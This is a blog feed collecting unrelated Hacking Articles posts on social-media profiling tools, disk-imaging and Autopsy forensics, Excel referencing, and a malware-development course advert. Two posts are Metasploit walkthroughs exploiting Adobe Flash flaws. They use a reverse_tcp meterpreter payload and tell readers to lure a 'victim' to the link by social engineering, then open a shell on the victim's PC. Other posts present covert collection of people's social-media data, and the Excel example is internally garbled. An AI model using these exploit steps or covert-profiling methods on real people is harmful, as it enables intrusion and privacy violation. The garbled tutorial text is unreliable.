Channel: Hacking Articles
Viewing all 1748 articles

How to perform Forensic Investigation on user Linkedin Account

LinkedIn Forensic Toolkit is a forensic tool for investigating a chosen user's LinkedIn account and collecting all of its information, such as the profile, connections, all discussions, etc.

The main advantage is that the user will not know that the investigator viewed the account.

Download LinkedIn Forensic Toolkit from here and install it on your PC.

Now open LinkedIn Forensic Toolkit and click on “New Case”.

Here you must choose one of the options. I chose profile ID because I have the URL of the user's profile, which is easy to find. Proceed to the next step.

In the new case, enable all options to display all the user information in the LinkedIn account, from when he or she created the account to today’s date. Now proceed to the next step.

Next, choose the location where you want to save the report,
e.g. C:\Users\RAJ\Desktop\linkedin

Then fill in the remaining information such as case number, evidence number, description, note, etc.

Also enable the AUTO LOG option and proceed to the next step.

Now in the input field, type the URL of the user's LinkedIn account, or find it and copy and paste it. Proceed to the next step.

Now it will ask for an authentication code; for that, click on OPEN WEB PAGE.

When you click on OPEN WEB PAGE you will be redirected to a web page where you have to give your authentication details (no account details will be disclosed after entering your credentials) and click on Allow Access.

An authentication code will now be generated. Copy that code and type or paste it where the authentication code was requested.

Now I have entered the authentication code that was generated after logging in with my details.

Now start the process and let it finish.

After the process has completed you can see the complete information about the user's LinkedIn account.

You can see the information in XML form, including all the data. Other information related to the user's LinkedIn account will be saved in the file location you gave earlier; I gave

E.g. C:\Users\RAJ\Desktop\linkedin

 

 

Author: Devjeet Singh is a young Indian entrepreneur and cyber security researcher. He is acknowledged by Microsoft, Adobe, Nokia, and BlackBerry.

The post How to perform Forensic Investigation on user Linkedin Account appeared first on Hacking Articles.


How to Perform Forensic Investigation on YouTube

Intro: YouTube Forensic Toolkit is a tool that can gather information such as user videos, channel videos, and videos by category. With this tool you can do a lot more than you can on YouTube itself, as described below.

First download the YouTube forensic tool from here and install it on your system.

After installation, open the YouTube forensic tool and fill in the required fields: Investigator Name, Operation Name, Case Number, Case File Location and Case Description, and give the location to save the report of the investigation.

Click on Save to proceed to the next step.

In the next step you can see several options such as Most Popular, Keyword Search, URL Search and User Search. I chose keyword search, as I am not targeting any user or channel; if you want to target a channel or user, choose URL search or user search and type the username or paste the URL from YouTube.
My keyword is hacking articles and I chose Tech as the category; the number of results can be anything, and I chose 25.

Then click on Search to start searching with the chosen option.

After the search is complete you can see the results for the option you chose. As I chose hacking articles as the keyword, my results relate to hacking articles. Here you can see the following: video title, video comment, video likes, username, last updated, keywords and category.

Here you can also do the following: download video, view comments, request suspense, etc.

For that, right-click on the video and select the task to perform.
You can also check the full report in the folder location you gave in the first step.

Author: Abdul Salam is a cyber security researcher and corporate trainer at Ignite Technologies. He has 2+ years of experience in cyber security.

The post How to Perform Forensic Investigation on YouTube appeared first on Hacking Articles.

Forensic Investigation of any Twitter account

Twitter Forensic Toolkit is a forensic tool for investigating the Twitter account of a criminal or prime suspect and collecting its information, such as the user profile, number of tweets, tweets by user and date, total followers, total following, etc.

Download Twitter Forensic Toolkit from here and install it on your PC.

Now fill in the required fields such as Investigator Name, Operation Name, Case Number and Case Description, and give a file location to save the report of the Twitter user account.

E.g. C:\Users\RAJ\Desktop. Click Save to proceed to the next step.

In the next step you have to choose one of the options: search tweets By a User, To a User, To and From a User, or Referencing a User. Choose according to your requirement. I chose By a User and gave the account URL to get all the information from the user's Twitter account; the number of results can be anything, and I gave 25. Now click on the Search button to proceed to the next step.

Here you can see the consumer key, the consumer secret and Get Pin.
Click on Get Pin to get the code.

To get the pin, it will first ask for your Twitter account login (not the suspect account's login details), and then a pin will be generated as shown below. Copy it.

Paste the pin and click on Authorize to start processing the required Twitter account.

After the process completes you can see the complete report of the desired Twitter account, such as the count of tweets, followers, following and likes, as well as all the tweets, including date and time.

Now on the toolbar select TOOLS and then Configuration. A window will open where you can see options such as enabling real-time monitoring to keep the user's tweets up to date; you can also configure your email address to receive the report by email.

The rest of the report will be saved in the folder location that was given in the first step.

Author: Abdul Salam is a cyber security researcher and corporate trainer at Ignite Technologies. He has 2+ years of experience in cyber security.

The post Forensic Investigation of any Twitter account appeared first on Hacking Articles.

How to create copy of Suspects Evidence Using (FTK Imager)

(From  forensicswiki.org )

The Forensic Toolkit Imager (FTK Imager) is a commercial forensic imaging software package distributed by AccessData. (AccessData offers computer forensics software and training. Their flagship product is Forensic Toolkit, but they offer several others.)

FTK Imager supports storage of disk images in EnCase’s or SMART’s file format, as well as in raw (dd) format. With Isobuster technology built in,

IMPORTANT: Before proceeding, when using FTK Imager to create a forensic image of a suspect’s hard drive, make sure you are using a hardware-based write-blocking device. This ensures that your operating system does not alter the suspect’s hard drive when you attach the drive to your computer.

First download FTK Imager from http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.2.0 and install it.

Now open FTK Imager and click on Create Disk Image.

A “Select Source” box will open. Choose “Physical Drive” and click NEXT.

Now choose the drive of the suspect's evidence that you want to image.

After choosing the drive, click on Finish to start creating the image of the suspect's evidence.

(Note: choose the option “Verify images after they are created”.)

Now in Select Image Type choose “Raw (dd)” and click on NEXT.

Now in “Evidence Item Information” fill in the following attributes. As you can see, I have given some random information; fill it in as per the suspect's evidence. Click NEXT.

Now choose the location of the image you want to create and give the image a filename. Then click on FINISH.

In the final step, click the START button to start creating the image.

Processing has now started; wait until the creation completes.

As we chose “Verify images after they are created”, the process will verify the image and complete.

The image of the suspect's evidence has been created successfully. Now you can audit the suspect's evidence from the image created with FTK Imager.
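
The verification step above can be repeated independently whenever the raw (dd) image is copied or handed over. The following Python sketch is an added example, not part of the original article or of FTK Imager: it recomputes MD5 and SHA-1 over the image and compares them with digests recorded at acquisition time. The file names, the .001/.002 segment naming and the `recorded` dictionary are assumptions made for illustration, and the sample data in demo() is constructed.

```python
import hashlib
import hmac
import os
import re
import tempfile

CHUNK = 1024 * 1024  # read 1 MiB at a time so multi-GB images never sit in memory


def image_segments(first_segment):
    """Return the ordered list of files that make up the image.

    A single-file image (evidence.dd) is returned as-is. If the name ends in
    a numeric extension (.001), the consecutive .002, .003, ... files found
    next to it are appended; the first missing number ends the list.
    """
    m = re.fullmatch(r"(.*\.)(\d{3})", first_segment)
    if not m:
        return [first_segment]
    stem, number = m.group(1), int(m.group(2))
    segments = []
    while os.path.isfile(f"{stem}{number:03d}"):
        segments.append(f"{stem}{number:03d}")
        number += 1
    if not segments:
        raise FileNotFoundError(first_segment)
    return segments


def hash_image(first_segment):
    """Compute MD5 and SHA-1 over all segments in a single pass."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    total = 0
    for path in image_segments(first_segment):
        with open(path, "rb") as fh:
            while chunk := fh.read(CHUNK):
                md5.update(chunk)
                sha1.update(chunk)
                total += len(chunk)
    return {"md5": md5.hexdigest(), "sha1": sha1.hexdigest(), "bytes": total}


def verify_image(first_segment, recorded):
    """Compare computed digests with those recorded at acquisition time.

    `recorded` maps "md5"/"sha1" to hex strings copied from the case notes.
    Returns (ok, details); ok is True only if every recorded digest matches.
    """
    computed = hash_image(first_segment)
    details = {}
    for algo, expected in recorded.items():
        expected = expected.strip().lower().replace(" ", "")
        details[algo] = hmac.compare_digest(computed[algo], expected)
    return bool(details) and all(details.values()), details


def demo():
    """Constructed sample: a two-segment image, verified, then altered."""
    with tempfile.TemporaryDirectory() as d:
        data = bytes(range(256)) * 4096           # 1 MiB of constructed data
        first = os.path.join(d, "evidence.001")
        with open(first, "wb") as fh:
            fh.write(data[:700_000])
        with open(os.path.join(d, "evidence.002"), "wb") as fh:
            fh.write(data[700_000:])
        recorded = {"md5": hashlib.md5(data).hexdigest(),
                    "sha1": hashlib.sha1(data).hexdigest()}
        before = verify_image(first, recorded)
        with open(first, "r+b") as fh:            # simulate one altered byte
            fh.seek(1234)
            fh.write(b"\xff")
        after = verify_image(first, recorded)
        return before, after


if __name__ == "__main__":
    print(demo())
```

A single changed byte anywhere in any segment makes both digests fail, which is why the recorded values belong in the case notes alongside the image.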

Author: Abdul Salam is a cyber security researcher and corporate trainer at Ignite Technologies. He has 2+ years of experience in cyber security.

The post How to create copy of Suspects Evidence Using (FTK Imager) appeared first on Hacking Articles.

Hack Remote Windows PC using Adobe Flash Player copy Pixels to ByteArray Integer Overflow

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.

Exploit Targets

Windows 7

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/windows/browser/adobe_flash_copy_pixel_to_byte_array

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set lhost 192.168.1.16 (IP of Local Host)

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set srvhost 192.168.1.16

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set uripath /

msf exploit (adobe_flash_copy_pixel_to_byte_array)>exploit

Now the URL you should give to your victim is http://192.168.1.16:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the link (http://192.168.1.16:8080) a session will be opened as shown below

Now type sessions -l to display the sessions opened when the victim opens the link

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

The post Hack Remote Windows PC using Adobe Flash Player copy Pixels to ByteArray Integer Overflow appeared first on Hacking Articles.


Forensic Investigation of any FaceBook Profile

Facebook Forensic Toolkit is a forensic tool for investigating the Facebook account of a criminal or prime suspect and collecting its information, such as user info, profile, timeline, messages, events, albums, groups, likes, friends and contacts.

Download Facebook Forensic Toolkit from here and install it on your PC.

Now open Facebook Forensic Toolkit and click on “Examine Profile and Clone Data”.

Now in New Case – Information, browse to the location where the report should be saved,
for example: C:\Users\RAJ\Desktop\facebookforensic

Now fill in the following details: case number, evidence number, description, examiner and notes.

Now click on the Next button.

In the next step you have to enter the desired Facebook account URL,
for example: www.facebook.com/yourprofile. Proceed to the next step.

Now in the New Case – Evidence step you have to choose the content that you want to search in the desired Facebook account. As in the image, I chose to show all content, so I can see all the content.

In this step you have to authenticate with your own Facebook account to continue the process.

Note: Authentication with the desired Facebook account is not required, and no Facebook account details will be disclosed.

In the top right corner you can see the Start button. Click it to start the process, and wait until the toolkit gathers all the information from the desired Facebook account.

Now you can see the result; I chose to show all the content from the desired Facebook account.

All the content, such as profile, timeline, photo albums, etc., will be shown for the desired Facebook account. The image here displays the desired account's profile.

In the timeline, FFT displays the information in XML form, but all the required data is shown as text.

Here in the image you can see the categories the user has liked,
e.g. website, actor, cars, etc.

Here you can see the user's groups and which groups he administers.

When the process completes, a report will be created with a name such as report-2124.

The report will be saved in the location you gave in the second step; I gave C:\Users\RAJ\Desktop\facebookforensic.
Now open the report and you can see everything the user has done in his Facebook account, including Facebook posts with dates.

Author: Abdul Salam is a cyber security researcher and corporate trainer at Ignite Technologies. He has 2+ years of experience in cyber security.

The post Forensic Investigation of any FaceBook Profile appeared first on Hacking Articles.

How to Perform Cell Referencing in Excel

Cell referencing is a very important term used in Excel formulas. Cell referencing means that one cell's address is referenced in another cell to do calculations.

There are three types of referencing:

  • Relative Referencing
  • Absolute Referencing
  • Mixed Referencing

Relative Referencing

By default, relative referencing is used in Excel. Now see the example of relative referencing. Look at the formula in cell G2, which references cells C2, D2, E2 and F2. When we copy this formula by dragging the lower right corner of the cell G1 to another cell location, such as G2 to G11, relative referencing takes place, because G3 references cells C3, D3, E3 and F3 relatively.

Absolute Referencing

Absolute referencing is used when we want to keep a cell address fixed. See the formula in cell G2, which computes Gross Salary, in which TA is fixed for each employee. To make cell F2 fixed, put a $ sign before the column name as well as the row number. Then drag the lower right corner of cell G2 down to cell G11.

Let us see another example of absolute referencing.

In this example, we are calculating the simple interest by multiplying principal, rate and time. When we drag the formula from F5 to F9, it shows the result as 0, because cell D7 containing Principal and cell E5 containing Rate are absolute.

So, to make cells D7 and E7 absolute, put a $ sign before the column name and row number of cells D7 and E7 in the formula in cell G7. Now drag the lower right corner of cell G7 down to cell G11. Now see the result: it shows the correct values.

Mixed Referencing

A combination of relative referencing and absolute referencing is referred to as mixed referencing. In this example, we are calculating the Simple Interest in cell G9 by multiplying F8, G8 and G9. When we drag from G9 to K9 and then to K13, it shows wrong values.

To rectify this, use mixed referencing. Use a $ sign with the column name and row number of cell F8, and a $ sign with the row number of cell G8, which is common to all cells of the rate value. Similarly, use a $ sign with the column name of cell F8, which is common to all cells of the time value. Now it shows the correct values.

Author: Mukul Mohan is a certified MCSE and MCSA. He is an experienced corporate trainer with 20+ years of experience. He now works with Ignite Technologies as a corporate trainer. If you are interested in Microsoft Server 2008 and Advanced Excel you can contact him at mukul@ignitetechnologies.in

The post How to Perform Cell Referencing in Excel appeared first on Hacking Articles.

Forensic Investigation of victim pc using Autopsy

Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It can be used by law enforcement, military, and corporate examiners to investigate what exactly happened on a computer. You can even use it to recover photos from your camera’s memory card for case investigation.

Autopsy features.

  • Timeline Analysis: Displays system events in a graphical interface to help identify activity.
  • Keyword Search: Text extraction and index searched modules enable you to find files that mention specific terms and find regular expression patterns.
  • Web Artifacts: Extracts web activity from common browsers to help identify user activity.
  • Registry Analysis: Uses RegRipper to identify recently accessed documents and USB devices.
  • LNK File Analysis: Identifies shortcuts and accessed documents.
  • Email Analysis: Parses MBOX format messages, such as Thunderbird.
  • EXIF: Extracts geolocation and camera information from JPEG files.
  • File Type Sorting: Group files by their type to find all images or documents.
  • Media Playback: View videos and images in the application and not require an external viewer.
  • Thumbnail viewer: Displays thumbnails of images to help quickly view pictures.
  • Robust File System Analysis: Support for common file systems, including NTFS, FAT12, FAT16, FAT32, HFS+, ISO9660 (CD-ROM), Ext2, Ext3, and UFS from The Sleuth Kit.
  • Hash Set Filtering: Filter out known good files using NSRL and flag known bad files using custom hashsets in HashKeeper, md5sum, and EnCase formats.
  • Tags: Tag files with arbitrary tag names, such as ‘bookmark’ or ‘suspicious’, and add comments.
  • Unicode Strings Extraction: Extracts strings from unallocated space and unknown file types in many languages (Arabic, Chinese, Japanese, etc.).
  • File Type Detection based on signatures and extension mismatch detection.
  • Interesting Files Module will flag files and folders based on name and path.
  • Android Support: Extracts data from SMS, call logs, contacts, Tango, Words with Friends, and more.

First download Autopsy from here and install it on your PC.

Click New Case. The ‘Create a New Case’ page will open. You can also use a device clone that was created earlier (click here to view).

Fill in the ‘Case Name’ and ‘Base Directory’ and choose the location to save the report, e.g. c:\users\raj\desktop\autopsy report

Then click on Next to proceed to the next step.

In the next step, enter the case number and examiner details and click on Finish to proceed to the next step.

Now in Add Data Source you have to complete three steps.

In the first step, Enter Data Source Information, select local disk, the location of the local disk and the time zone for your location, then click on Next to proceed to step 2.

In step 2, Configure Ingest Modules, I chose all the modules because I wanted complete information on the evidence device, disk or computer. Click Next for step 3.

In Add Data Source just click on Finish to generate the report of the device; you can then perform a complete investigation of the victim's device, PC or disk.

Here you can see the user's local disk. We can analyze it completely from here without accessing the actual data on the local disk. You can see Data Sources, Views, Results, Email Messages, Interesting Items, etc.

Finally, when you choose Data Sources and select the drive we chose, you can see the details shown in the image: all the files and folders available on the local disk, along with their Modified Time, Change Time, Access Time, etc.

With these you can investigate the user's details on the local disk, and also find out which files were deleted from the disk, with their time and date and other information.
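
The Modified, Change and Access times listed above are the raw material of timeline analysis. As an added example (not from the original article and not Autopsy's own code), this Python sketch turns those timestamps into a chronological timeline from a body file, the pipe-delimited listing that The Sleuth Kit's `fls -m` can produce; the sample records, paths and function names are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample records in The Sleuth Kit 3.x body-file layout:
#   MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime   (epoch seconds)
SAMPLE_BODY = """\
0|/Users/raj/Documents/report.docx|4101-128-1|r/rrwxrwxrwx|0|0|18432|1420106400|1420106400|1420106400|1420020000
0|/Users/raj/Downloads/setup.exe|4188-128-3|r/rrwxrwxrwx|0|0|901120|1420110000|1420020000|1420110000|1420110000
0|/Users/raj/Desktop/notes.txt (deleted)|4207-128-1|r/rrwxrwxrwx|0|0|512|0|1420113600|1420113600|1420106400
"""

FLAGS = "macb"  # modified, accessed, changed (metadata), born (created)


def parse_body(text):
    """Parse body-file text into dicts; raise ValueError on a malformed line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            # A file name may itself contain '|', so peel the fixed fields
            # off the right-hand side instead of splitting left to right.
            _md5, rest = line.split("|", 1)
            name, inode, _mode, _uid, _gid, size, *times = rest.rsplit("|", 9)
            atime, mtime, ctime, crtime = (int(t) for t in times)
            size = int(size)
        except ValueError:
            raise ValueError(f"line {lineno}: not a body-file record") from None
        entries.append({"name": name, "inode": inode, "size": size,
                        "m": mtime, "a": atime, "c": ctime, "b": crtime})
    return entries


def build_timeline(entries, start=None, end=None):
    """Return rows (utc_time, macb, size, inode, name) sorted by time.

    Timestamps of 0 mean "not recorded" and are skipped. Events of one file
    that share a second are merged into one row, e.g. "m.c." for a write
    that also updated the metadata. start/end (epoch seconds, end exclusive)
    restrict the window under examination.
    """
    events = defaultdict(set)
    for e in entries:
        for flag in FLAGS:
            ts = e[flag]
            if ts <= 0:
                continue
            if start is not None and ts < start:
                continue
            if end is not None and ts >= end:
                continue
            events[(ts, e["name"], e["inode"], e["size"])].add(flag)
    rows = []
    for (ts, name, inode, size), flags in sorted(events.items()):
        stamp = datetime.fromtimestamp(ts, tz=timezone.utc)
        macb = "".join(f if f in flags else "." for f in FLAGS)
        rows.append((stamp.strftime("%Y-%m-%d %H:%M:%S"), macb, size, inode, name))
    return rows


if __name__ == "__main__":
    for row in build_timeline(parse_body(SAMPLE_BODY)):
        print("{}  {}  {:>8}  {:<12} {}".format(*row))
```

In the constructed sample, setup.exe has an `m...` row earlier than its `.acb` row, a modification time that predates its creation on the volume, which is the kind of ordering a timeline makes visible.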

Author: Abdul Salam is a cyber security researcher and corporate trainer at Ignite Technologies. He has 2+ years of experience in cyber security.

The post Forensic Investigation of victim pc using Autopsy appeared first on Hacking Articles.

Learn How to Hack an App Video Series

Do you know how to hack an app? Do you want to learn? All it takes is a few readily available tools and a matter of minutes for today’s hackers to successfully exploit a mobile application. To see how it’s done, watch these short clips below as Jonathan Carter from Arxan Technologies demonstrates just how easy it is for hackers to perform mobile attack vectors.

iTunes Code Encryption Bypass

Android APK Reverse Engineering

Algorithm Decompilation and Analysis

Baksmali Code Modification

Reverse Engineering String Analysis

Swizzle with Code Substitution

Understanding application internal structures and methods via Class Dumps

For more information on how to address these threats and harden the security of your own app, visit Arxan’s application protection page.

The post Learn How to Hack an App Video Series appeared first on Hacking Articles.

Hack Remote Windows PC using Adobe Flash Player Uncompress Via Zlib Variant Uninitialized Memory

This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Exploit Targets

Windows 7

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole

Now type use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set lhost 192.168.1.13 (IP of Local Host)

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set srvhost 192.168.1.13

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set uripath /

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>exploit

Now the URL you should give to your victim is http://192.168.1.13:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the link (http://192.168.1.13:8080) a session will be opened as shown below

Now type sessions -l to display the sessions opened when the victim opens the link

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

The post Hack Remote Windows PC using Adobe Flash Player Uncompress Via Zlib Variant Uninitialized Memory appeared first on Hacking Articles.


Learn Malware Development

http://www.ignitetechnologies.in/malware.php ( for Course Content )

http://www.ignitetechnologies.in/registration.php ( for Registration )

Why should you learn malware development techniques (computer virology)?

  1. Those who should not know it already know it.
  2. You cannot fight bad guys by disarming good guys.
  3. It forces you to see computer science and engineering from a completely new perspective.
  4. It forces you to brush up on concepts from various sub-fields of CS (both theoretical and practical).
  5. It enables you to think like a bad guy, which comes in handy when hunting for bad guys.

How does it benefit you?

After learning computer virology, you gain deep knowledge of the internals of computer malware. A lot of malware techniques have legitimate uses as well (e.g. anti-piracy, legitimate monitoring tools, etc.). With knowledge of malware internals, you can quickly switch to malware analysis and malware detection, and help others fight malicious software.

Possible Job Profiles

  1. Malware analyst
  2. Malware researcher (working on new possible techniques and then their detection mechanism. Prevent the malware even before it is born)
  3. Research on highly sophisticated attacks

Basically, your job will revolve around malicious code,

The post Learn Malware Development appeared first on Hacking Articles.

How to Find your IMEI No. of Your Lost Android Phone

From Wikipedia

The International Mobile Station Equipment Identity or IMEI is a number, usually unique, to identify 3GPP (i.e., GSM, UMTS and LTE) and iDEN mobile phones, as well as some satellite phones. It is usually found printed inside the battery compartment of the phone, but can also be displayed on-screen on most phones by entering *#06# on the dial pad, or alongside other system information in the settings menu on smartphone operating systems.

The IMEI number is used by a GSM network to identify valid devices and therefore can be used for stopping a stolen phone from accessing that network. For example, if a mobile phone is stolen, the owner can call his or her network provider and instruct them to “blacklist” the phone using its IMEI number. This renders the phone useless on that network and sometimes other networks too, whether or not the phone’s SIM is changed.

The IMEI is only used for identifying the device and has no permanent or semi-permanent relation to the subscriber. Instead, the subscriber is identified by transmission of an IMSI number, which is stored on a SIM card that can (in theory) be transferred to any handset. However, many network and security features are enabled by knowing the current device being used by a subscriber.

Open google.com/settings, sign-in with your Google account and expand the Android tab.

 

The post How to Find your IMEI No. of Your Lost Android Phone appeared first on Hacking Articles.
